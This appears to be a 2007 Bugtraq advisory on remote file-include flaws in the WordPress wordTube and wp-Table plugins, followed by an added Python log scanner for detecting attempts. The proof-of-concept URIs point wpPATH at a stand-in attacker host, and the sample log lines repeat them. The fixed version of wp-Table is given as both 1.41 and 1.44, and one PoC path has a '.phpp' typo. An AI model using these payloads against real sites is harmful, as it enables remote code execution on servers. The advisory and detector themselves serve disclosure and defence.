WordPress Plugins Multiple Remote File Include Vulnerabilities
BID:23737
Info
| Bugtraq ID: | 23737 |
| Class: | Input Validation Error |
| CVE: | CVE-2007-2482, CVE-2007-2481 |
| Remote: | Yes |
| Local: | No |
| Published: | May 01 2007 12:00AM |
| Updated: | Jul 06 2016 02:39PM |
| Credit: | M.Hasran Addahroni is credited with the discovery of these vulnerabilities. |
| Vulnerable: | Ruben Boelinger wp-Table plugin for Wordpress 1.43; Ruben Boelinger wordTube plugin for Wordpress 1.43 |
| Not Vulnerable: | |
Discussion
The WordPress wordTube and wp-Table plugins are prone to multiple remote file-include vulnerabilities because they fail to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
wp-Table 1.43 and wordTube 1.43 are vulnerable; other versions may also be affected.
Exploit / POC
Attackers can use a browser to exploit these issues.
The following proof-of-concept URIs are available:
http://www.example.com/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://www.example2.com/evil?
http://www.example.com/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.example2.com/evil?
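As an added defensive example (not part of the advisory), the following Python script scans Common Log Format access-log lines for requests to the two plugin directories named in the PoC URIs whose wpPATH parameter carries a URL scheme, a protocol-relative host or a PHP stream wrapper instead of a local directory; it flags any script under those two directories, not only the two button scripts shown above. The log lines and client addresses are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Plugin directories named in the advisory's PoC URIs, relative to the WordPress root.
VULNERABLE_PLUGIN_DIRS = ("/wp-content/plugins/wp-table/", "/wp-content/plugins/wordtube/")
# wpPATH is meant to be a local directory. A URL scheme, a protocol-relative "//host"
# or a PHP stream wrapper (php://, data:, ftp://) means the include target is not local.
# The scheme must be at least two characters so a Windows drive letter ("c:") is not flagged.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+:|//)", re.IGNORECASE)
# Common Log Format: client ident user [time] "METHOD uri HTTP/x.y" status bytes
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def remote_wppath(uri):
    """Return the decoded wpPATH value when `uri` hits a vulnerable plugin directory
    with a non-local wpPATH, otherwise None."""
    parts = urlsplit(uri)
    if not unquote(parts.path).startswith(VULNERABLE_PLUGIN_DIRS):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("wpPATH", []):
        # parse_qs decoded once already; decode again to catch double-encoded "://".
        decoded = unquote(value)
        if REMOTE_VALUE.match(decoded):
            return decoded
    return None

def scan_access_log(lines):
    """Return (client, timestamp, status, wpPATH) for every RFI attempt in CLF lines."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if m:
            client, ts, uri, status = m.groups()
            value = remote_wppath(uri)
            if value is not None:
                hits.append((client, ts, int(status), value))
    return hits

# Constructed sample log lines (not from a real server). The first two mirror the
# advisory's PoC URIs, the third is double-encoded, the last two must not be flagged.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/May/2007:10:15:02 +0000] "GET /wp-content/plugins/wp-table/js/wptable-button.php?wpPATH=http://www.example2.com/evil? HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/May/2007:10:15:03 +0000] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.example2.com/evil? HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/May/2007:10:16:10 +0000] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http%253A%252F%252Fwww.example2.com%252Fevil%253F HTTP/1.1" 500 0',
    '192.0.2.4 - - [01/May/2007:10:17:00 +0000] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=/var/www/html/ HTTP/1.1" 200 512',
    '192.0.2.5 - - [01/May/2007:10:18:00 +0000] "GET /wp-content/plugins/other/page.php?wpPATH=http://www.example2.com/ HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("RFI attempt: client=%s time=%s status=%d wpPATH=%s" % hit)
```

A 200 response on a flagged request is the one to triage first: it means the web server served the script after PHP tried the remote include, so check whether allow_url_include was enabled on that host.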
Solution / Fix
Solution:
The vendor has released wordTube 1.44 and wp-Table 1.41 to address these issues. Please see the references for details.
Ruben Boelinger wordTube plugin for Wordpress 1.43
- Fixed in: Ruben Boelinger Wordpress wordTube Plugin version 1.44
  http://alexrabe.boelinger.com/?dl=wordtube.zip
Ruben Boelinger wp-Table plugin for Wordpress 1.43
- Fixed in: Ruben Boelinger wp-Table for WordPress version 1.44
  http://alexrabe.boelinger.com/?dl=wp-table.zip
References
References:
- Wordpress wordTube plugin Web Site (Ruben Boelinger)
- Wordpress wp-Table plugin Web Site (Ruben Boelinger)
- [ECHO_ADV_81$2007] wordpress plugins wordTube <= 1.43 (wpPATH) Remote File Inclu (M.Hasran Addahroni)
- [ECHO_ADV_82$2007] wordpress plugins wp-Table <= 1.43 (wpPATH) Remote File Inclu (M.Hasran Addahroni)